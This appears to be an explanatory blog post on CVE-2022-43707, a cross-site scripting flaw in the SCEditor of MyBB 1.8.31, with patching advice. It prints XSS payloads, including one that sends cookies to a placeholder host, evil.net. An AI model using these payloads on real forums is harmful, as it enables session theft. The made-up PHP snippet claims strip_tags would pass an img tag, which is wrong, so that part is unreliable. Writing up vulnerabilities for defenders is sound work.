CVE-2022-43707 - Breaking Down the MyBB 1.8.31 XSS Vulnerability in SCEditor

Nov 22, 2022

In late 2022, a critical security issue (tracked as CVE-2022-43707) was discovered in MyBB 1.8.31, one of the world’s most popular open source forum platforms. The vulnerability was found in the visual MyCode editor (commonly known as SCEditor). This bug allows attackers to inject malicious HTML, potentially letting them steal session cookies, modify forum content, or perform actions as another user—all through Cross-site Scripting (XSS).

What is CVE-2022-43707?

This vulnerability is an XSS flaw in MyBB 1.8.31's visual editor (SCEditor). XSS means attackers can inject JavaScript or HTML into your website, affecting anyone who views the infected content.

Reflected XSS: When data sent in a request is reflected back to the user’s browser unfiltered.

- Stored XSS: When malicious code is saved in the database and executed every time someone opens the infected page.

Example Scenario

Let’s say your forum user submits a post, signature, or profile field with some sneaky code. If MyBB’s SCEditor doesn’t clean it properly, the malicious code executes whenever someone views that post or profile.

Where is the Problem in Code?

SCEditor is the rich text editor MyBB uses for posts and messages. The vulnerability is found in how it parses and displays user input with HTML entities.

Historically, MyBB tried to filter out dangerous code, but in this version, a flaw lets certain HTML tags through the editor.

Here’s a simplified code snippet (not from the source, but models the issue)

// Example: bad handling of user input
$input = $_POST['post_content'];
$allowed_tags = '<b><i><u>'; // Only allow these tags
$safe_input = strip_tags($input, $allowed_tags);

// Outputs: <img src=x onerror=alert(1)>
echo $safe_input;

If you submit

<img src=x onerror=alert('XSS')>

MyBB tried to remove tags, but SCEditor’s handling could let dangerous HTML through depending on the context.

Exploit Details and PoC

The actual exploit can be as simple as posting a payload like the following in a forum post, private message, or signature:

<img src="x" onerror="alert('XSS via SCEditor')">

When another user visits the post, the JavaScript runs in their browser.

Attackers can use similar approaches to steal cookies

<img src="#" onerror="document.location='http://evil.net/grab?c='+document.cookie">;

This payload would capture session info and send it to the attacker.

How to Fix or Prevent This Issue

If you’re running MyBB 1.8.31 or older, update to the latest version right away!
The issue has been patched in later versions.

Here’s an improved PHP example

// Safer: remove all HTML, only allow safe text
$safe_input = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
echo $safe_input;

References

- National Vulnerability Database (NVD): CVE-2022-43707
- MyBB Official Security Advisories
- GitHub MyBB Issue #4683
- SCEditor Project
- OWASP XSS Guide

Final Thoughts

CVE-2022-43707 is a reminder that visual editors and user-generated content need aggressive input escaping and sanitization. If you run a MyBB forum, keep your software updated and review settings that allow HTML input.

Don’t let your forum become an easy target. Test your setup, restrict input wherever possible, and stay informed about vulnerabilities in every tool your platform uses.

For more details or a full review of your MyBB installation security, see the links above or reach out in the MyBB community forums.

Timeline

Published on: 11/22/2022 00:15:00 UTC
Last modified on: 11/22/2022 15:09:00 UTC